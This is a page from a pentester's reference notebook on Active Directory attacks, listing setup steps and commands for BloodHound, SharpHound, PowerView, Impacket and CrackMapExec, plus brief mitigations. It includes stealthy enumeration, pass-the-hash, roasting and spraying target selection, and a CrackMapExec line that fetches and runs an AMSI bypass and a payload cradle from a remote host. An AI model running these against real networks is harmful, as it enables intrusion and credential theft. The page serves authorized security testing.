Pentester's Promiscuous Notebook
BlogGitHubTwitter
Search…
README
⚒️ Pentest
C2
Infrastructure
AD
ACL Abuse
AD CS Abuse
ADIDNS Abuse
Attack Trusts
AV / EDR Evasion
Authentication Coercion
Azure
Credentials Dump
DCSync
Delegation Abuse
Discovery
DnsAdmins
Dominance
GPO Abuse
Kerberos
Key Credentials Abuse
LAPS
Lateral Movement
LDAP
NTLM
Password Spraying
Post Exploitation
PrivExchange
Privileges Abuse
RID Cycling
Roasting
SCCM Abuse
SMB
RPC
Token Manipulation
User Hunt
WSUS
Zerologon
DevOps
DBMS
Authentication Brute Force
File Transfer
IPMI
Kiosk Breakout
Low-Hanging Fruits
LPE
Networks
NFS
Persistence
Pivoting
Post Exploitation
SNMP
TFTP
VNC
Misc
OSINT
Password Brute Force
Perimeter
Shells
Web
Wi-Fi
⚔️ Red Team
Basics
Cobalt Strike
Infrastructure
Malware Development
SE
⚙️ Admin
Git
Linux
Networking
Virtualization
Windows
Powered By GitBook
AD
Pentesting AD Mindmap

AD Labs

Capsulecorp

Game Of Active Directory

Microsoft Wont-Fix-List

Tools

BloodHound

Setup

curl -sSL https://api.github.com/repos/BloodHoundAD/BloodHound/releases/latest | jq -r '.assets[].browser_download_url' | grep 'BloodHound-linux-x64.zip' | wget -O 'BloodHound.zip' -i -
unzip BloodHound.zip && rm BloodHound.zip
mv BloodHound-linux-x64 BloodHound && cd BloodHound
sudo chown root:root chrome-sandbox
sudo chmod 4755 chrome-sandbox
chmod +x BloodHound
sudo mkdir /usr/share/neo4j/logs/
mkdir -p ~/.config/bloodhound
curl -sSL https://github.com/ShutdownRepo/Exegol-images/raw/main/sources/bloodhound/customqueries.json > /tmp/customqueries1.json
curl -sSL https://github.com/CompassSecurity/BloodHoundQueries/raw/master/customqueries.json > /tmp/customqueries2.json
curl -sSL https://github.com/ZephrFish/Bloodhound-CustomQueries/raw/main/customqueries.json > /tmp/customqueries3.json
curl -sSL https://github.com/ly4k/Certipy/raw/main/customqueries.json > /tmp/customqueries4.json
python3 - << 'EOT'
import json
from pathlib import Path
merged, dups = {'queries': []}, set()
for jf in sorted((Path('/tmp')).glob('customqueries*.json')):
with open(jf, 'r') as f:
for query in json.load(f)['queries']:
if 'queryList' in query.keys():
qt = tuple(q['query'] for q in query['queryList'])
if qt not in dups:
merged['queries'].append(query)
dups.add(qt)
with open(Path.home() / '.config' / 'bloodhound' / 'customqueries.json', 'w') as f:
json.dump(merged, f, indent=4)
EOT
rm /tmp/customqueries*.json
curl -sSL "https://github.com/ShutdownRepo/Exegol-images/raw/main/sources/bloodhound/config.json" > ~/.config/bloodhound/config.json
sed -i 's/"password": "exegol4thewin"/"password": "WeaponizeK4li!"/g' ~/.config/bloodhound/config.json

Collectors

SharpHound.exe
SharpHound cheatsheet (by @SadProcessor)
PS > .\SharpHound.exe [-d megacorp.local] [--LdapUsername snovvcrash] [--LdapPassword 'Passw0rd!'] -c All,GPOLocalGroup [--Stealth] --CollectAllProperties --OutputDirectory C:\Windows\Temp --MemCache --ZipFileName backup_full.zip [--RandomFilenames] [--Throttle 100] [--Jitter 20]
PS > .\SharpHound.exe -c SessionLoop --Loop --LoopInterval 00:01:00 --Loopduration 03:09:41
SharpHound.ps1
PS > Invoke-Bloodhound [-Domain megacorp.local] [-LdapUsername snovvcrash] [-LdapPassword 'Passw0rd!'] -CollectionMethod All,GPOLocalGroup [-Stealth] -CollectAllProperties -OutputDirectory C:\Windows\Temp -NoSaveCache -RandomizeFilenames -ZipFileName backup_full.zip [-Throttle 100] [-Jitter 20]
PS > Invoke-Bloodhound -CollectionMethod SessionLoop -Loop -LoopInterval 00:01:00 -Loopduration 03:09:41
BloodHound.py
$ cd ~/ws/enum/bloodhound/bloodhound.py/
$ bloodhound-python -c All,LoggedOn --zip -u snovvcrash -p 'Passw0rd!' -d megacorp.local -ns 192.168.1.11
$ proxychains4 -q bloodhound-python -c All,LoggedOn --zip -u snovvcrash --hashes aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889 -d megacorp.local -ns 192.168.1.11 -dc DC01.megacorp.local -gc DC01.megacorp.local --dns-tcp
Import with bloodhound-import:
$ bloodhound-import -du neo4j -dp 'Passw0rd!' 20190115133114*.json
ADExplorerSnapshot.py

Cypher (Neo4j)

Show percentage of collected user sessions:
# http://localhost:7474/browser/
MATCH (u1:User)
WITH COUNT(u1) AS totalUsers
MATCH (c:Computer)-[r:HasSession]->(u2:User)
WITH totalUsers, COUNT(DISTINCT(u2)) AS usersWithSessions
RETURN totalUsers, usersWithSessions, 100 * usersWithSessions / totalUsers AS percetange
Show path to any computer from kerberoastable users:
MATCH (u:User {hasspn:true}), (c:Computer), p=shortestPath((u)-[*1..]->(c)) RETURN p

Manual JSON Parsing

There're 2 global dicts in JSON files: data and meta. We care about data:
$ cat 20220604031239_users.json | jq '. | keys'
[
"data",
"meta"
]
List all active user accounts:
cat 20220604031239_users.json | jq '.data[].Properties | select(.enabled == true) | .name' -r
List non-empty user accounts' descriptions:
cat 20220604031239_users.json | jq '.data[].Properties | select(.enabled == true and .description != null) | .name + " :: " + .description' -r
List user accounts whose passwords were set after their last logon (an effective list for password spraying assuming that the passwords were set by IT Desk and may be guessable):
cat 20220604031239_users.json | jq '.data[].Properties | select(.enabled == true and .pwdlastset > .lastlogontimestamp) | .name + " :: " + (.lastlogontimestamp | tostring)' -r
List user accounts with DoesNotRequirePreAuth set (aka asreproastable):
cat 20220604031239_users.json | jq '.data[].Properties | select(.enabled == true and .dontreqpreauth == true) | .name' -r
List user accounts with SPN(s) set (aka kerberoastable)
cat 20220604031239_users.json | jq '.data[].Properties | select(.enabled == true and .serviceprincipalnames != []) | .name + " :: " + (.serviceprincipalnames | join(","))' -r
List computer accounts' operating system names:
cat 20220604031239_computers.json | jq '.data[].Properties | .name + " :: " + .operatingsystem' -r
Recursively list all members of a group (mimics RSAT Get-ADGroupMember, script):
$ ls
20220604043009_computers.json 20220604043009_groups.json 20220604043009_users.json
$ python3 get_ad_group_member.py 'DOMAIN [email protected]'
Recursively list all groups which the user is a member of (mimics RSAT Get-ADUser | select memberof, script):
$ ls
20220604043009_groups.json 20220604043009_users.json
$ python3 get_ad_user_memberof.py '[email protected]'
Generate a .csv file containing AD trusts mapping to be used in TrustVisualizer (mimics PowerView Get-DomainTrustMapping, script):
$ ls
20220604043009_domains.json
$ python3 get_domain_trust_mapping.py

PowerView / SharpView

Example Queries

Users
Convert SID to name and vice versa:
PV3 > ConvertTo-SID <NAME>
PV3 > Convert-NameToSid <NAME>
PV3 > ConvertFrom-SID <SID>
PV3 > Convert-SidToName <SID>
Extract all domain user accounts into a .csv file:
PV3 > Get-DomainUser -Domain megacorp.local | select name,samAccountName,description,memberOf,whenCreated,pwdLastSet,lastLogonTimestamp,accountExpires,adminCount,userPrincipalName,servicePrincipalName,mail,userAccountControl | Export-Csv .\all-users.csv -NoTypeInformation
List domain user accounts that do not require Kerberos pre-authentication (see ASREPRoasting):
PS > .\SharpView.exe Get-DomainUser -KerberosPreauthNotRequired -Properties samAccountName,userAccountControl,memberOf
List domain user accounts with Service Principal Names (SPNs) set (see Kerberoasting):
PS > .\SharpView.exe Get-DomainUser -SPN -Properties samAccountName,memberOf,servicePrincipalName
List domain user accounts with Kerberos unconstrained delegation enabled:
PS > .\SharpView.exe Get-DomainUser -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=524288)"
List domain user accounts with Kerberos constrained delegation enabled:
PS > .\SharpView.exe Get-DomainUser -TrustedToAuth -Properties samAccountName,userAccountControl,memberOf
Search for domain user accounts which may have sensitive stored in the description field:
PV3 > Get-DomainUser -Properties samaccountname,description | Where {$_.description -ne $null}
Search for domain user by email:
PV3 > Get-DomainUser -LDAPFilter '([email protected])' -Properties samaccountname
Find users with DCSync right:
PV3 > $dcsync = Get-DomainObjectACL "DC=megacorp,DC=local" -ResolveGUIDs | ? {$_.ActiveDirectoryRights -match "GenericAll" -or $_.ObjectAceType -match "Replication-Get"} | select -ExpandProperty SecurityIdentifier | select -ExpandProperty value
PV3 > Convert-SidToName $dcsync
Groups
Enumerate domain computers where specific users (Identity) are members of a specific local group (LocalGroup):
PV3 > Get-DomainGPOUserLocalGroupMapping -Identity snovvcrash -LocalGroup Administrators
Computers
Extract all domain computer accounts into a .csv file:
PV3 > Get-DomainComputer -Properties dnsHostName,operatingSystem,lastLogonTimestamp,userAccountControl | Export-Csv .\all-computers.csv -NoTypeInformation
List domain computer accounts that allow Kerberos unconstrained delegation:
PS > .\SharpView.exe Get-DomainComputer -Unconstrained -Properties dnsHostName,userAccountControl
Resolve all domain computer IPs by their names:
PV3 > Get-DomainComputer -Properties name | Resolve-IPAddress
List domain computers that are part of a OU:
PV3 > Get-DomainComputer | ? { $_.DistinguishedName -match "OU=<OU_NAME>" } | select dnsHostName
Shares
List shares for WS01 computer:
PS > .\SharpView.exe Get-NetShare -ComputerName WS01
GPOs
List all domain users with a 4-digit RID (eliminates default objects like 516, 519, etc.) who can edit GPOs:
PV3 > Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "WriteProperty|WriteDacl|WriteOwner" -and $_.SecurityIdentifier -match "<SID>-[\d]{4,10}" } | select objectDN, activeDirectoryRights, securityIdentifier | fl
Resolve GPO ObjectDN:
PV3 > Get-DomainGPO -Name "<DN>" -Properties DisplayName

Impacket

Install:
$ git clone https://github.com/SecureAuthCorp/impacket ~/tools/impacket && cd ~/tools/impacket
$ pip3 install .
Or
$ pipx install -f "git+https://github.com/SecureAuthCorp/impacket.git"

CrackMapExec (CME)

Install:
$ pipx install -f "git+https://github.com/Porchetta-Industries/CrackMapExec.git"
$ cme -h
Install for debugging and developement:
$ git clone --recursive https://github.com/Porchetta-Industries/CrackMapExec ~/tools/CrackMapExec && cd ~/tools/CrackMapExec
$ poetry install
$ poetry run crackmapexec -h
Execute a PowerShell command using base64 encoding on-the-fly:
$ cme smb 192.168.1.11 -u snovvcrash -p 'Passw0rd!' -x "powershell -enc `echo -n 'iex(new-object net.webclient).downloadstring("http://10.10.13.37/amsi.ps1");iex(new-object net.webclient).downloadstring("http://10.10.13.37/cradle.ps1")' | iconv -t UTF-16LE | base64 -w0`"

Mitigations

Common vulnerabilities & misconfigurations and recommendations:
SMB lateral-movement hardening:
SMB Enumeration-Exploitation-Hardening (Anil BAS).pdf
3MB
PDF
Antispam protection for Exchange:
Antispam Forefront Protection 2010 (Exchange Server).pdf
2MB
PDF
Detect stale, unused or fake computer accounts based on password age (replace -90 with your domain's maximum computer account password age):
$date = [DateTime]::Today.AddDays(-90); Get-ADComputer -Filter '(Enabled -eq $true) -and (PasswordLastSet -le $date)' | select Name
Administrative Tier Model & Microsoft RaMP (Zero Trust Rapid Modernization Plan):
Post compromise AD actions (checklist):
Hardening automatization tool:
⚒️ Pentest - Previous
Infrastructure
Next
ACL Abuse
Last modified 7d ago
Copy link
Outline
AD Labs
Capsulecorp
Game Of Active Directory
Microsoft Wont-Fix-List
Tools
BloodHound
PowerView / SharpView
Impacket
CrackMapExec (CME)
Mitigations